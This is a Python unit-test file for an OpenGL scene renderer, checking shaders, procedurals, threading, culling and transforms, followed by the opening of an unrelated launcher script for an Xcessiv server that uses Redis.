r.setOption( "gl:searchPath:shader", StringData( os.path.dirname( __file__ ) + "/shaders" ) )
r.display( os.path.dirname( __file__ ) + "/output/testStackBug.tif", "tiff", "rgba", {} )
r.worldBegin()
r.shader( "surface", "rgbColor", { "red" : FloatData( 1 ), "green" : FloatData( 0 ), "blue" : FloatData( 0 ) } )
r.concatTransform( M44f.createTranslated( V3f( 0, 0, -5 ) ) )
r.attributeBegin()
r.shader( "surface", "rgbColor", { "red" : FloatData( 1 ), "green" : FloatData( 1 ), "blue" : FloatData( 0 ) } )
r.geometry( "sphere", {}, {} )
r.attributeEnd()
r.concatTransform( M44f.createTranslated( V3f( -1, 0, 0 ) ) )
r.geometry( "sphere", {}, {} )
r.concatTransform( M44f.createTranslated( V3f( 2, 0, 0 ) ) )
r.geometry( "sphere", {}, {} )
r.worldEnd()
i = Reader.create( os.path.dirname( __file__ ) + "/output/testStackBug.tif" ).read()
e = PrimitiveEvaluator.create( i )
result = e.createResult()
r = e.R()
g = e.G()
b = e.B()
e.pointAtUV( V2f( 0.5, 0.5 ), result )
self.assertEqual( result.floatPrimVar( r ), 1 )
self.assertEqual( result.floatPrimVar( g ), 1 )
self.assertEqual( result.floatPrimVar( b ), 0 )
e.pointAtUV( V2f( 0, 0.5 ), result )
self.assertEqual( result.floatPrimVar( r ), 1 )
self.assertEqual( result.floatPrimVar( g ), 0 )
self.assertEqual( result.floatPrimVar( b ), 0 )
e.pointAtUV( V2f( 1, 0.5 ), result )
self.assertEqual( result.floatPrimVar( r ), 1 )
self.assertEqual( result.floatPrimVar( g ), 0 )
self.assertEqual( result.floatPrimVar( b ), 0 )
def testPrimVars( self ) :
r = Renderer()
r.setOption( "gl:mode", StringData( "immediate" ) )
r.setOption( "gl:searchPath:shader", StringData( os.path.dirname( __file__ ) + "/shaders" ) )
r.display( os.path.dirname( __file__ ) + "/output/testPrimVars.tif", "tiff", "rgba", {} )
r.worldBegin()
r.shader( "surface", "rgbColor", {} )
r.concatTransform( M44f.createTranslated( V3f( 0, 0, -5 ) ) )
r.attributeBegin()
# should make red, green and blue spheres
r.geometry( "sphere", {}, {
"red" : PrimitiveVariable( PrimitiveVariable.Interpolation.Constant, FloatData( 1 ) ),
"green" : PrimitiveVariable( PrimitiveVariable.Interpolation.Constant, FloatData( 0 ) ),
"blue" : PrimitiveVariable( PrimitiveVariable.Interpolation.Constant, FloatData( 0 ) ),
}
)
r.attributeEnd()
r.concatTransform( M44f.createTranslated( V3f( -1, 0, 0 ) ) )
r.geometry( "sphere", {}, {
"red" : PrimitiveVariable( PrimitiveVariable.Interpolation.Constant, FloatData( 0 ) ),
"green" : PrimitiveVariable( PrimitiveVariable.Interpolation.Constant, FloatData( 1 ) ),
"blue" : PrimitiveVariable( PrimitiveVariable.Interpolation.Constant, FloatData( 0 ) ),
}
)
r.concatTransform( M44f.createTranslated( V3f( 2, 0, 0 ) ) )
r.geometry( "sphere", {}, {
"red" : PrimitiveVariable( PrimitiveVariable.Interpolation.Constant, FloatData( 0 ) ),
"green" : PrimitiveVariable( PrimitiveVariable.Interpolation.Constant, FloatData( 0 ) ),
"blue" : PrimitiveVariable( PrimitiveVariable.Interpolation.Constant, FloatData( 1 ) ),
}
)
r.worldEnd()
i = Reader.create( os.path.dirname( __file__ ) + "/output/testPrimVars.tif" ).read()
e = PrimitiveEvaluator.create( i )
result = e.createResult()
r = e.R()
g = e.G()
b = e.B()
e.pointAtUV( V2f( 0, 0.5 ), result )
self.assertEqual( result.floatPrimVar( r ), 0 )
self.assertEqual( result.floatPrimVar( g ), 1 )
self.assertEqual( result.floatPrimVar( b ), 0 )
e.pointAtUV( V2f( 0.5, 0.5 ), result )
self.assertEqual( result.floatPrimVar( r ), 1 )
self.assertEqual( result.floatPrimVar( g ), 0 )
self.assertEqual( result.floatPrimVar( b ), 0 )
e.pointAtUV( V2f( 1, 0.5 ), result )
self.assertEqual( result.floatPrimVar( r ), 0 )
self.assertEqual( result.floatPrimVar( g ), 0 )
self.assertEqual( result.floatPrimVar( b ), 1 )
def testImagePrimitive( self ) :
r = Renderer()
r.setOption( "gl:mode", StringData( "immediate" ) )
r.setOption( "gl:searchPath:shader", StringData( os.path.dirname( __file__ ) + "/shaders" ) )
r.display( os.path.dirname( __file__ ) + "/output/testImage.exr", "exr", "rgba", {} )
r.camera(
"main",
{
"projection" : IECore.StringData( "orthographic" ),
"resolution" : IECore.V2iData( IECore.V2i( 1024 ) ),
"clippingPlanes" : IECore.V2fData( IECore.V2f( 1, 1000 ) ),
"screenWindow" : IECore.Box2fData( IECore.Box2f( IECore.V2f( -1 ), IECore.V2f( 1 ) ) )
}
)
i = Reader.create( os.path.dirname( __file__ ) + "/images/numbers.exr" ).read()
with IECore.WorldBlock( r ) :
# the shader should be ignored.
r.shader( "surface", "color", { "colorValue" : Color3fData( Color3f( 1, 0, 0 ) ) } )
r.concatTransform( M44f.createTranslated( V3f( 0, 0, -5 ) ) )
r.concatTransform( M44f.createScaled( V3f( 2. / i.bound().size().x ) ) )
i.render( r )
i2 = Reader.create( os.path.dirname( __file__ ) + "/output/testImage.exr" ).read()
self.assertEqual( ImageDiffOp()( imageA = i, imageB = i2, maxError = 0.05 ).value, False )
## \todo Make this assert something
def testAlphaBlending( self ) :
r = Renderer()
r.setOption( "gl:mode", StringData( "deferred" ) )
r.setOption( "gl:searchPath:shader", StringData( os.path.dirname( __file__ ) + "/shaders" ) )
r.worldBegin()
r.setAttribute( "gl:blend:srcFactor", StringData( "one" ) )
r.setAttribute( "gl:blend:dstFactor", StringData( "one" ) )
r.setAttribute( "gl:blend:equation", StringData( "add" ) )
r.concatTransform( M44f.createTranslated( V3f( 0, 0, -5 ) ) )
r.concatTransform( M44f.createScaled( V3f( 0.004 ) ) )
r.concatTransform( M44f.createTranslated( V3f( -150, -200, 0 ) ) )
i = Reader.create( os.path.dirname( __file__ ) + "/images/numberWithAlpha.exr" ).read()
i.render( r )
r.concatTransform( M44f.createTranslated( V3f( 300, 300, 1 ) ) )
i.render( r )
r.worldEnd()
def testProcedural( self ) :
r = Renderer()
r.setOption( "gl:mode", StringData( "immediate" ) )
r.setOption( "gl:searchPath:shader", StringData( os.path.dirname( __file__ ) + "/shaders" ) )
r.display( os.path.dirname( __file__ ) + "/output/proceduralTest.tif", "tiff", "rgba", {} )
r.worldBegin()
r.shader( "surface", "color", { "colorValue" : Color3fData( Color3f( 1, 0, 0 ) ) } )
r.concatTransform( M44f.createTranslated( V3f( 0, 0, -5 ) ) )
r.concatTransform( M44f.createScaled( V3f( 0.1 ) ) )
p = ReadProcedural()
p["files"]["name"].setValue( StringData( "test/IECore/data/cobFiles/pSphereShape1.cob" ) )
p.render( r )
r.worldEnd()
expectedImage = Reader.create( os.path.dirname( __file__ ) + "/expectedOutput/proceduralTest.tif" )()
actualImage = Reader.create( os.path.dirname( __file__ ) + "/output/proceduralTest.tif" )()
self.assertEqual( ImageDiffOp()( imageA = expectedImage, imageB = actualImage, maxError = 0.05 ).value, False )
## \todo Make this assert something
def testShader( self ) :
r = Renderer()
r.setOption( "gl:mode", StringData( "deferred" ) )
r.setOption( "gl:searchPath:shader", StringData( os.path.dirname( __file__ ) + "/shaders" ) )
r.setOption( "gl:searchPath:shaderInclude", StringData( os.path.dirname( __file__ ) + "/shaders/include" ) )
r.worldBegin()
r.shader( "surface", "color", { "colorValue" : Color3fData( Color3f( 1, 0, 0 ) ) } )
r.concatTransform( M44f.createTranslated( V3f( 0, 0, -5 ) ) )
r.geometry( "sphere", {}, {} )
r.worldEnd()
s = r.scene()
s.render( State( True ) )
def __countChildrenRecursive( self, g ) :
if not isinstance( g, Group ):
return 1
count = 0
for c in g.children():
count += self.__countChildrenRecursive( c )
return count
def testEdits( self ):
r = Renderer()
r.setOption( "gl:mode", StringData( "deferred" ) )
r.worldBegin()
r.worldEnd()
with CapturingMessageHandler() as handler :
r.attributeBegin()
r.setAttribute( "gl:color", Color4fData( Color4f( 1, 2, 3, 4 ) ) )
r.attributeEnd()
self.assertEqual( len( handler.messages ), 3 )
with CapturingMessageHandler() as handler :
r.command( "editBegin", {} )
r.attributeBegin()
r.setAttribute( "gl:color", Color4fData( Color4f( 1, 2, 3, 4 ) ) )
r.attributeEnd()
r.command( "editEnd", {} )
self.assertEqual( len( handler.messages ), 0 )
def testRemoveObject( self ) :
r = Renderer()
r.setOption( "gl:mode", StringData( "deferred" ) )
with WorldBlock( r ) :
r.setAttribute( "name", "sphereOne" )
r.sphere( 1, -1, 1, 360, {} )
r.setAttribute( "name", "sphereTwo" )
r.sphere( 1, -1, 1, 360, {} )
with AttributeBlock( r ) :
r.sphere( 1, -1, 1, 360, {} )
r.setAttribute( "name", "sphereOne" )
r.sphere( 1, -1, 1, 360, {} )
r.sphere( 1, -1, 1, 360, {} )
r.sphere( 1, -1, 1, 360, {} )
s = r.scene()
self.assertEqual( len( s.root().children() ), 3 )
# check that trying to remove objects when not in an editBegin/editEnd block
# fails and prints a message
errorCatcher = CapturingMessageHandler()
with errorCatcher :
commandResult = r.command( "removeObject", { "name" : StringData( "sphereOne" ) } )
self.assertEqual( commandResult, None )
self.assertEqual( len( errorCatcher.messages ), 1 )
# check we can remove one object without affecting the other
r.command( "editBegin", {} )
commandResult = r.command( "removeObject", { "name" : StringData( "sphereOne" ) } )
r.command( "editEnd", {} )
self.assertEqual( commandResult, BoolData( True ) )
self.assertEqual( len( s.root().children() ), 2 )
self.assertEqual( self.__countChildrenRecursive( s.root() ), 2 )
# now we test that either the sphere and the following attribute block ( instantiates as a Group ) are removed
r.command( "editBegin", {} )
commandResult = r.command( "removeObject", { "name" : StringData( "sphereTwo" ) } )
r.command( "editEnd", {} )
self.assertEqual( commandResult, BoolData( True ) )
self.assertEqual( len( s.root().children() ), 0 )
def testEditQuery( self ) :
r = Renderer()
r.setOption( "gl:mode", StringData( "deferred" ) )
with WorldBlock( r ) :
self.assertEqual( r.command( "editQuery", {} ), IECore.BoolData( False ) )
self.assertEqual( r.command( "editQuery", {} ), IECore.BoolData( False ) )
r.command( "editBegin", {} )
self.assertEqual( r.command( "editQuery", {} ), IECore.BoolData( True ) )
r.command( "editEnd", {} )
self.assertEqual( r.command( "editQuery", {} ), IECore.BoolData( False ) )
def testRemoveObjectDuringProcedural( self ) :
r = Renderer()
r.setOption( "gl:mode", StringData( "deferred" ) )
with WorldBlock( r ) :
r.setAttribute( "name", "sphereOne" )
r.sphere( 1, -1, 1, 360, {} )
r.setAttribute( "name", "sphereTwo" )
r.sphere( 1, -1, 1, 360, {} )
s = r.scene()
self.assertEqual( len( s.root().children() ), 2 )
class RemovalProcedural( Renderer.Procedural ):
def __init__( proc ):
Renderer.Procedural.__init__( proc )
def bound( proc ) :
return Box3f( V3f( -1 ), V3f( 1 ) )
def render( proc, renderer ):
commandResult = renderer.command( "removeObject", { "name" : StringData( "sphereOne" ) } )
self.assertEqual( commandResult, BoolData( True ) )
def hash( self ):
h = IECore.MurmurHash()
return h
r.command( "editBegin", {} )
r.procedural( RemovalProcedural() )
r.command( "editEnd", {} )
self.assertEqual( len( s.root().children() ), 1 )
self.assertEqual( self.__countChildrenRecursive( r.scene().root() ), 1 )
def testRemoveObjectWithResourcesDuringProcedural( self ) :
r = Renderer()
r.setOption( "gl:searchPath:shader", StringData( os.path.dirname( __file__ ) + "/shaders" ) )
r.setOption( "gl:mode", StringData( "deferred" ) )
with WorldBlock( r ) :
with AttributeBlock( r ) :
r.setAttribute( "name", "sphereOne" )
r.shader( "surface", "image", {
"texture" : IECore.SplinefColor3fData(
IECore.SplinefColor3f(
IECore.CubicBasisf.catmullRom(),
(
( 0, IECore.Color3f( 1 ) ),
( 0, IECore.Color3f( 1 ) ),
( 1, IECore.Color3f( 0 ) ),
( 1, IECore.Color3f( 0 ) ),
),
),
),
} )
r.sphere( 1, -1, 1, 360, {} )
s = r.scene()
self.assertEqual( len( s.root().children()[0].children() ), 1 )
s.render()
class RemovalProcedural( Renderer.Procedural ):
def __init__( proc, level=0 ) :
Renderer.Procedural.__init__( proc )
def bound( proc ) :
return Box3f( V3f( -1 ), V3f( 1 ) )
def render( proc, renderer ):
commandResult = renderer.command( "removeObject", { "name" : StringData( "sphereOne" ) } )
self.assertEqual( commandResult, BoolData( True ) )
def hash( self ):
h = IECore.MurmurHash()
return h
r.command( "editBegin", {} )
# typically you wouldn't call a renderer method on a separate thread like this. we're just
# doing it here to force the procedural onto a different thread. if left to its own devices
# the renderer will run procedurals on different threads, but it equally well might call
# them on the main thread. we force the procedural onto a separate thread so we can reliably
# exercise a problem we're trying to address.
t = threading.Thread( target=IECore.curry( r.procedural, RemovalProcedural() ) )
t.start()
t.join()
# if an edit session removes objects which use gl resources (shaders, textures etc),
# then it's essential that the editEnd call occurs on the thread with the correct gl context.
# this is so the gl resources can be deleted in the correct context.
r.command( "editEnd", {} )
self.assertEqual( len( s.root().children() ), 0 )
def testParallelRenders( self ):
allScenes = []
def threadedRendering():
r = Renderer()
r.setOption( "gl:mode", StringData( "deferred" ) )
r.setOption( "gl:searchPath:shader", StringData( os.path.dirname( __file__ ) + "/shaders" ) )
r.setOption( "gl:searchPath:shaderInclude", StringData( os.path.dirname( __file__ ) + "/shaders/include" ) )
r.worldBegin()
r.shader( "surface", "failWithoutPreprocessing", {} )
r.concatTransform( M44f.createTranslated( V3f( 0, 0, -5 ) ) )
r.worldEnd()
allScenes.append( r.scene() )
for i in xrange( 0, 100 ):
newThread = threading.Thread(target=threadedRendering)
newThread.start()
while len(allScenes) < 100 :
pass
for s in allScenes :
s.render( State( True ) )
class RecursiveProcedural( Renderer.Procedural ):
"""Creates a pyramid of spheres"""
maxLevel = 5
threadsUsed = set()
def __init__( self, level = 0 ):
Renderer.Procedural.__init__( self )
self.__level = level
if level == 0 :
self.threadsUsed.clear()
def bound( self ) :
return Box3f( V3f( -1 ), V3f( 1 ) )
def render( self, renderer ):
# registers this thread id
self.threadsUsed.add( threading.currentThread().getName() )
renderer.attributeBegin()
renderer.setAttribute( "color", Color3fData( Color3f( float(self.__level)/self.maxLevel, 0, 1 - float(self.__level)/self.maxLevel ) ) )
renderer.transformBegin()
renderer.concatTransform( M44f.createTranslated(V3f( 0, 0.5, 0 )) )
renderer.concatTransform( M44f.createScaled( V3f(0.5) ) )
renderer.geometry( "sphere", {}, {} )
renderer.transformEnd()
# end of recursion
if self.__level < self.maxLevel :
renderer.transformBegin()
renderer.concatTransform( M44f.createTranslated(V3f( 0, -0.5, 0 )) )
for i in xrange( 0, 2 ) :
renderer.transformBegin()
renderer.concatTransform( M44f.createTranslated(V3f( (i - 0.5) , 0, 0)) )
renderer.concatTransform( M44f.createScaled( V3f(0.5) ) )
proc = TestRenderer.RecursiveProcedural( self.__level + 1 )
renderer.procedural( proc )
renderer.transformEnd()
renderer.transformEnd()
renderer.attributeEnd()
def hash( self ):
h = IECore.MurmurHash()
return h
class RecursiveParameterisedProcedural( ParameterisedProcedural ):
maxLevel = 5
threadsUsed = set()
def __init__( self, level = 0 ):
ParameterisedProcedural.__init__( self )
self.__level = level
if level == 0 :
self.threadsUsed.clear()
def doRenderState( self, renderer, args ):
pass
def doBound( self, args ) :
return Box3f( V3f( -1 ), V3f( 1 ) )
def doRender( self, renderer, args ):
# registers this thread id
self.threadsUsed.add( threading.currentThread().getName() )
# end of recursion
if self.__level < self.maxLevel :
for i in xrange( 0, 2 ) :
proc = TestRenderer.RecursiveParameterisedProcedural( self.__level + 1 )
proc.render( renderer )
def __testMultithreadedProcedural( self, procType ):
r = Renderer()
r.setOption( "gl:mode", StringData( "deferred" ) )
r.setOption( "gl:searchPath:shader", StringData( os.path.dirname( __file__ ) + "/shaders" ) )
r.setOption( "gl:searchPath:shaderInclude", StringData( os.path.dirname( __file__ ) + "/shaders/include" ) )
r.worldBegin()
p = procType()
if isinstance( p, Renderer.Procedural ):
r.procedural( p )
else:
p.render( r )
r.worldEnd()
self.assert_( len(procType.threadsUsed) > 1 )
def __testParallelMultithreadedProcedurals( self, procType ):
renders = []
def newRender():
r = Renderer()
r.setOption( "gl:mode", StringData( "deferred" ) )
r.setOption( "gl:searchPath:shader", StringData( os.path.dirname( __file__ ) + "/shaders" ) )
r.setOption( "gl:searchPath:shaderInclude", StringData( os.path.dirname( __file__ ) + "/shaders/include" ) )
r.worldBegin()
p = procType()
if isinstance( p, Renderer.Procedural ):
r.procedural( p )
else:
p.render( r )
r.worldEnd()
renders.append( 0 )
threads = []
for i in xrange( 0,10 ):
newThread = threading.Thread(target=newRender)
newThread.start()
threads.append( newThread )
for t in threads :
t.join()
def testMultithreadedProcedural( self ):
self.__testMultithreadedProcedural( self.RecursiveProcedural )
def testMultithreadedParameterisedProcedural( self ):
self.__testMultithreadedProcedural( self.RecursiveParameterisedProcedural )
def testParallelMultithreadedProcedurals( self ):
self.__testParallelMultithreadedProcedurals( self.RecursiveProcedural )
def testParallelMultithreadedProcedurals( self ):
self.__testParallelMultithreadedProcedurals( self.RecursiveParameterisedProcedural )
def testDisableProceduralThreading( self ):
r = Renderer()
r.setOption( "gl:mode", StringData( "deferred" ) )
r.setOption( "gl:searchPath:shader", StringData( os.path.dirname( __file__ ) + "/shaders" ) )
r.setOption( "gl:searchPath:shaderInclude", StringData( os.path.dirname( __file__ ) + "/shaders/include" ) )
with WorldBlock( r ) :
r.setAttribute( "gl:procedural:reentrant", BoolData( False ) )
p = self.RecursiveParameterisedProcedural()
p.render( r )
self.assertEqual( len( self.RecursiveParameterisedProcedural.threadsUsed ), 1 )
def testObjectSpaceCulling( self ):
p = self.RecursiveProcedural()
def renderWithCulling( box ):
r = Renderer()
r.setOption( "gl:mode", StringData( "deferred" ) )
r.worldBegin()
r.sphere( 1.5, 0, 1, 360, {} )
r.procedural( p )
r.attributeBegin()
if True:
r.setAttribute( "gl:cullingSpace", StringData( "object" ) )
r.setAttribute( "gl:cullingBox", Box3fData( box ) )
# everything in this block is culled
r.sphere( 1.5, 0, 1, 360, {} )
r.procedural( p )
r.attributeEnd()
r.worldEnd()
return self.__countChildrenRecursive( r.scene().root() )
noCullingCounter = renderWithCulling( Box3f() )
# verify that only half of the things are renderer when the giving culling box is defined.
self.assertEqual( renderWithCulling( Box3f( V3f(2,-1,-1), V3f(3,1,1) ) ) * 2, noCullingCounter )
def testWorldSpaceCulling( self ):
p = self.RecursiveProcedural()
box = Box3f( V3f(0.001,-1,-1), V3f(1,1,1) )
r = Renderer()
r.setOption( "gl:mode", StringData( "deferred" ) )
r.worldBegin()
r.setAttribute( "gl:cullingSpace", StringData( "world" ) )
r.setAttribute( "gl:cullingBox", Box3fData( box ) )
r.sphere( 1, 0, 1, 360, {} ) # half-inside : 1 element
r.procedural( p ) # half-inside: 32 elements (full procedural renders 63 elements)
r.transformBegin()
if True:
r.concatTransform( M44f.createTranslated( V3f(-2, 0, 0) ) )
# everything in this block is culled
r.sphere( 1, 0, 1, 360, {} )
r.procedural( p )
r.transformEnd()
r.worldEnd()
self.assertEqual( self.__countChildrenRecursive( r.scene().root() ), 33 )
def testTransformsInImmediateRenderer( self ):
r = Renderer()
r.setOption( "gl:mode", StringData( "immediate" ) )
r.transformBegin()
r.concatTransform( M44f.createRotated( V3f( 1, 1, 1 ) ) )
r.camera( "main", { "resolution" : V2iData( V2i( 512 ) ), "projection" : StringData( "perspective" ) } )
r.transformEnd()
r.worldBegin()
# confirm that the camera transformation is not affecting the world space matrix
r.concatTransform( M44f.createTranslated( V3f( 1, 0, 0 ) ) )
self.assert_( r.getTransform().equalWithAbsError( M44f.createTranslated( V3f( 1, 0, 0 ) ), 1e-4 ) )
# confirm that setting the world space transform does not affect the camera matrix (that was already set in openGL )
r.setTransform( M44f.createTranslated( V3f( 0, 1, 0 ) ) )
self.assert_( r.getTransform().equalWithAbsError( M44f.createTranslated( V3f( 0, 1, 0 ) ), 1e-4 ) )
r.worldEnd()
def testTransformsInDeferredRenderer( self ):
r = Renderer()
r.setOption( "gl:mode", StringData( "deferred" ) )
r.transformBegin()
r.concatTransform( M44f.createRotated( V3f( 1, 1, 1 ) ) )
r.camera( "main", { "resolution" : V2iData( V2i( 512 ) ), "projection" : StringData( "perspective" ) } )
r.transformEnd()
r.worldBegin()
# confirm that the camera transformation is not affecting the world space matrix
self.assert_( r.getTransform().equalWithAbsError( M44f(), 1e-4 ) )
r.concatTransform( M44f.createTranslated( V3f( 1, 0, 0 ) ) )
r.concatTransform( M44f.createRotated( V3f( 1, 1, 1 ) ) )
m = r.getTransform()
r.transformBegin()
if True:
# confirm that the transformBegin did not change the current transform
self.assert_( r.getTransform().equalWithAbsError( m, 1e-4 ) )
# confirm that concatenate transform works
r.concatTransform( M44f.createTranslated( V3f( 1, 0, 0 ) ) )
self.assert_( r.getTransform().equalWithAbsError( M44f.createTranslated( V3f( 1, 0, 0 ) ) * m, 1e-4 ) )
r.concatTransform( M44f.createScaled( V3f(0.5) ) )
self.assert_( r.getTransform().equalWithAbsError( M44f.createScaled( V3f(0.5) ) * M44f.createTranslated( V3f( 1, 0, 0 ) ) * m, 1e-4 ) )
# confirm that setting the world space transform works too
m2 = M44f.createTranslated( V3f( 0, 1, 0 ) )
r.setTransform( m2 )
self.assert_( r.getTransform().equalWithAbsError( m2, 1e-4 ) )
r.attributeBegin()
if True:
# confirm that the attributeBegin did not change the current transform
self.assert_( r.getTransform().equalWithAbsError( m2, 1e-4 ) )
# confirm that setting the world space transform works too
r.setTransform( M44f.createRotated( V3f( 3, 1, 0 ) ) )
self.assert_( r.getTransform().equalWithAbsError( M44f.createRotated( V3f( 3, 1, 0 ) ), 1e-4 ) )
r.attributeEnd()
# confirms that attributeEnd recovers the matrix.
self.assert_( r.getTransform().equalWithAbsError( m2, 1e-4 ) )
r.transformEnd()
# confirms that transformEnd recovers the matrix.
self.assert_( r.getTransform().equalWithAbsError( m, 1e-4 ) )
r.worldEnd()
def testInstances(self):
r = Renderer()
r.instanceBegin( "instanceA", {} )
r.concatTransform( M44f.createTranslated( V3f( 1, 0, 0 ) ) )
r.transformBegin()
r.concatTransform( M44f.createTranslated( V3f( 1, 0, 0 ) ) )
r.geometry( "sphere", {}, {} )
r.concatTransform( M44f.createTranslated( V3f( 1, 0, 0 ) ) )
r.geometry( "sphere", {}, {} )
r.transformEnd()
r.concatTransform( M44f.createTranslated( V3f( -1, 0, 0 ) ) )
r.geometry( "sphere", {}, {} )
r.instanceEnd()
r.instanceBegin( "instanceB", {} )
r.concatTransform( M44f.createTranslated( V3f( 0, 0, 10 ) ) )
r.instance( "instanceA" )
r.concatTransform( M44f.createTranslated( V3f( 0, 0, 20 ) ) )
r.instance( "instanceA" )
r.instanceEnd()
r.setOption( "gl:mode", StringData( "deferred" ) )
r.worldBegin()
r.concatTransform( M44f.createTranslated( V3f( 0, 5, 0 ) ) )
r.instance( "instanceB" )
r.setTransform( M44f.createTranslated( V3f( 0, 10, 0 ) ) )
r.instance( "instanceB" )
r.worldEnd()
g = r.scene().root()
self.assertEqual( self.__countChildrenRecursive( g ), 12 )
self.assert_( g.bound().min.equalWithAbsError( V3f( -1, 4, 9 ), 0.001 ) )
self.assert_( g.bound().max.equalWithAbsError( V3f( 4, 11, 31 ), 0.001 ) )
def testCuriousCrashOnThreadedProceduralsAndAttribute( self ):
myMesh = Reader.create( "test/IECore/data/cobFiles/pSphereShape1.cob").read()
class MyProc( Renderer.Procedural ):
def __init__( self, level = 0 ):
Renderer.Procedural.__init__( self )
self.__level = level
def bound( self ) :
return Box3f( V3f( -1 ), V3f( 1 ) )
def render( self, renderer ):
if self.__level < 2 :
for i in xrange( 0, 50 ) :
renderer.procedural( MyProc( self.__level + 1 ) )
else:
g = IECore.Group()
g.addChild( myMesh )
g.addState( IECore.AttributeState( { "name" : StringData( str(self.__level) ) } ) )
g.render( renderer )
def hash( self ):
h = IECore.MurmurHash()
return h
r = Renderer()
r.setOption( "gl:mode", StringData( "deferred" ) )
r.worldBegin()
p = MyProc()
r.procedural( p )
r.worldEnd()
def testDepthTest( self ) :
def doTest( depthTest, r, g, b ) :
renderer = Renderer()
renderer.setOption( "gl:mode", IECore.StringData( "immediate" ) )
renderer.setOption( "gl:searchPath:shader", IECore.StringData( os.path.dirname( __file__ ) + "/shaders" ) )
renderer.camera( "main", {
"projection" : IECore.StringData( "orthographic" ),
"resolution" : IECore.V2iData( IECore.V2i( 256 ) ),
"clippingPlanes" : IECore.V2fData( IECore.V2f( 1, 1000 ) ),
"screenWindow" : IECore.Box2fData( IECore.Box2f( IECore.V2f( -1 ), IECore.V2f( 1 ) ) )
}
)
renderer.display( os.path.dirname( __file__ ) + "/output/depthTest.tif", "tif", "rgba", {} )
m = IECore.MeshPrimitive.createPlane( IECore.Box2f( IECore.V2f( -1 ), IECore.V2f( 1 ) ) )
with IECore.WorldBlock( renderer ) :
renderer.setAttribute( "gl:depthTest", IECore.BoolData( depthTest ) )
renderer.concatTransform( IECore.M44f.createTranslated( IECore.V3f( 0, 0, -1 ) ) )
renderer.shader( "surface", "color", { "colorValue" : IECore.Color3fData( IECore.Color3f( 1, 0, 0 ) ) } )
m.render( renderer )
renderer.concatTransform( IECore.M44f.createTranslated( IECore.V3f( 0, 0, -1 ) ) )
renderer.shader( "surface", "color", { "colorValue" : IECore.Color3fData( IECore.Color3f( 0, 1, 0 ) ) } )
m.render( renderer )
i = IECore.Reader.create( os.path.dirname( __file__ ) + "/output/depthTest.tif" ).read()
for p in i["R"].data :
self.assertEqual( p, r )
for p in i["G"].data :
self.assertEqual( p, g )
for p in i["B"].data :
self.assertEqual( p, b )
doTest( True, 1, 0, 0 )
doTest( False, 0, 1, 0 )
def testCameraVisibility( self ) :
def doRender( mode, visibility ) :
r = Renderer()
r.setOption( "gl:mode", IECore.StringData( mode ) )
r.setOption( "gl:searchPath:shaderInclude", IECore.StringData( "./glsl" ) )
r.camera( "main", {
"projection" : IECore.StringData( "perspective" ),
"projection:fov" : IECore.FloatData( 20 ),
"resolution" : IECore.V2iData( IECore.V2i( 256 ) ),
"clippingPlanes" : IECore.V2fData( IECore.V2f( 1, 1000 ) ),
"screenWindow" : IECore.Box2fData( IECore.Box2f( IECore.V2f( -3 ), IECore.V2f( 3 ) ) )
}
)
if mode=="immediate" :
r.display( os.path.dirname( __file__ ) + "/output/testCameraVisibility.tif", "tif", "rgba", {} )
with IECore.WorldBlock( r ) :
r.concatTransform( IECore.M44f.createTranslated( IECore.V3f( 0, 0, -5 ) ) )
r.setAttribute( "gl:visibility:camera", IECore.BoolData( visibility ) )
r.points( 1, { "P" : IECore.PrimitiveVariable( IECore.PrimitiveVariable.Interpolation.Vertex, IECore.V3fVectorData( [ IECore.V3f( 0 ) ] ) ) } )
return r
# test immediate renderer by checking images
doRender( "immediate", True )
i = IECore.Reader.create( os.path.dirname( __file__ ) + "/output/testCameraVisibility.tif" ).read()
self.failUnless( i["A"].data[256 * 128 + 128] > .99 )
doRender( "immediate", False )
i = IECore.Reader.create( os.path.dirname( __file__ ) + "/output/testCameraVisibility.tif" ).read()
self.assertEqual( i["A"].data, IECore.FloatVectorData( [ 0 ] * 256 * 256 ) )
# test deferred renderer by checking scene
r = doRender( "deferred", True )
self.assertEqual( len( r.scene().root().children()[0].children() ), 1 )
r = doRender( "deferred", False )
self.assertEqual( len( r.scene().root().children() ), 0 )
def testWarningMessages( self ):
r = Renderer()
r.setOption( "gl:searchPath:shader", StringData( os.path.dirname( __file__ ) + "/shaders" ) )
# gl renderer only supports "surface" shaders, so it should complain about this:
c = CapturingMessageHandler()
with c :
with IECore.WorldBlock( r ):
r.shader( "shader", "color", { "colorValue" : Color3fData( Color3f( 1, 0, 0 ) ) } )
self.assertEqual( len( c.messages ), 1 )
self.assertEqual( c.messages[0].level, Msg.Level.Warning )
# it should just ignore this, because of the "ri:" prefix:
c = CapturingMessageHandler()
with c :
with IECore.WorldBlock( r ):
r.shader( "ri:shader", "color", { "colorValue" : Color3fData( Color3f( 1, 0, 0 ) ) } )
self.assertEqual( len( c.messages ), 0 )
# this should work fine:
c = CapturingMessageHandler()
with c :
with IECore.WorldBlock( r ):
r.shader( "gl:surface", "color", { "colorValue" : Color3fData( Color3f( 1, 0, 0 ) ) } )
self.assertEqual( len( c.messages ), 0 )
# it should just ignore this, because of the "lg:" prefix:
c = CapturingMessageHandler()
with c :
with IECore.WorldBlock( r ):
r.shader( "lg:shader", "color", { "colorValue" : Color3fData( Color3f( 1, 0, 0 ) ) } )
self.assertEqual( len( c.messages ), 0 )
# this aint right!:
c = CapturingMessageHandler()
with c :
with IECore.WorldBlock( r ):
r.shader( "gl:nonsense", "color", { "colorValue" : Color3fData( Color3f( 1, 0, 0 ) ) } )
self.assertEqual( len( c.messages ), 1 )
self.assertEqual( c.messages[0].level, Msg.Level.Warning )
def tearDown( self ) :
files = [
os.path.dirname( __file__ ) + "/output/testPrimVars.tif",
os.path.dirname( __file__ ) + "/output/testImage.exr",
os.path.dirname( __file__ ) + "/output/testStackBug.tif",
os.path.dirname( __file__ ) + "/output/proceduralTest.tif",
os.path.dirname( __file__ ) + "/output/depthTest.tif",
os.path.dirname( __file__ ) + "/output/testCameraVisibility.tif",
]
for f in files :
if os.path.exists( f ) :
os.remove( f )
if __name__ == "__main__":
unittest.main()
|
runapp.py
|
from __future__ import absolute_import, print_function, division, unicode_literals
import os
import sys
import argparse
from multiprocessing import Process, Pipe
from redis import Redis
from xcessiv.server import launch
from xcessiv.scripts.runworker import runworker
from xcessiv import app
from six import iteritems
def main():
parser = argparse.ArgumentParser(description='Launch Xcessiv server and workers')
parser.add_argument('-w', '--worker', help='Define number of workers', type=int)
parser.add_argument('-p', '--port', help='Port number to be used by web server',
type=int)
parser.add_argument('-H', '--host', help='Redis host')
parser.add_argument('-P', '--redisport', help='Redis port', type=int)
